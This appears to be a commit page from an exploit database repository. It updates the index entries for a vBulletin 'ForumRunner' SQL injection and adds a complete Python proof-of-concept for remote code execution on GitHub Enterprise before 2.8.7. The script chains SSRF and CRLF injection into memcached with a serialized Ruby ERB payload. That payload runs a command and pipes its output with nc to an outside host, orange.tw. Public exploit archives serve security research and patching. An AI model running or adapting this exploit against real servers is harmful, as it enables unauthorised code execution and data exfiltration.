DB: 2017-07-30
1 new exploits vBulletin 4.2.3 - 'ForumRunner' SQL Injection vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection GitHub Enterprise < 2.8.7 - Remote Code Execution
This commit is contained in:
parent
fb7bed6364
commit
25e79a8750
2 changed files with 32 additions and 1 deletions
|
@ -37434,7 +37434,7 @@ id,file,description,date,author,platform,type,port
|
|||
40746,platforms/php/webapps/40746.php,"e107 CMS 2.1.2 - Privilege Escalation",2016-11-09,"Kacper Szurek",php,webapps,0
|
||||
40749,platforms/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80
|
||||
40750,platforms/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps,0
|
||||
40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
|
||||
40751,platforms/php/webapps/40751.txt,"vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
|
||||
40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
|
||||
40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
|
||||
40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0
|
||||
|
@ -37914,6 +37914,7 @@ id,file,description,date,author,platform,type,port
|
|||
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
|
||||
42392,platforms/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,multiple,webapps,0
|
||||
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
|
||||
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
|
||||
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
30
platforms/multiple/webapps/42392.py
Executable file
30
platforms/multiple/webapps/42392.py
Executable file
|
@ -0,0 +1,30 @@
|
|||
#!/usr/bin/python
|
||||
from urllib import quote
|
||||
|
||||
''' set up the marshal payload from IRB
|
||||
code = "`id | nc orange.tw 12345`"
|
||||
p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult"
|
||||
'''
|
||||
marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'
|
||||
|
||||
payload = [
|
||||
'',
|
||||
'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code),
|
||||
marshal_code,
|
||||
'',
|
||||
''
|
||||
]
|
||||
|
||||
payload = map(quote, payload)
|
||||
url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/'
|
||||
|
||||
print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org"
|
||||
print '-'*10 + '\n'
|
||||
print url + '%0D%0A'.join(payload)
|
||||
print '''
|
||||
Inserting WebHooks from:
|
||||
https://ghe-server/:user/:repo/settings/hooks
|
||||
|
||||
Triggering RCE from:
|
||||
https://ghe-server/search?q=ggggg&type=Repositories
|
||||
'''
|
Loading…
Add table
Reference in a new issue